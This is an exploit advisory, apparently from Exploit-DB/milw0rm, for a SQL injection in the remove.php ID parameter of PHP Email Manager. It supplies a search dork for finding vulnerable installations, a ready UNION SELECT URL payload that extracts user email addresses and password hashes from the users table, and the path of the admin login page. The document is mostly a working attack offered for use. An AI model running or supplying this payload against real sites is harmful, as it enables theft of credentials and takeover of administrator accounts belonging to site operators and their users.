PHP Email Manager - 'remove.php?ID' SQL Injection

EDB-ID:

9470

Author:

MuShTaQ

Type:

webapps

Platform:

PHP

Published:

2009-08-18

===========================================|->
      ~ Mtrb3 hena [Security-Code] ~
===========================================|->

script :-> PHP Email Manager  < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

from :-> [WwW.SeC-CoDe.com]

C0ntact :a7m@mail.com

===========================================|->
              ~  Exploit ~
===========================================|->

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--

Admin Login:-> http//www.site.com/PHPEmailManager/login.php


-:::::::::::::::::: GreeetZ:::::::::::::::::-

Sniper.vb , Mr.Nrfzh,and all friends

Bay Bay

# milw0rm.com [2009-08-18]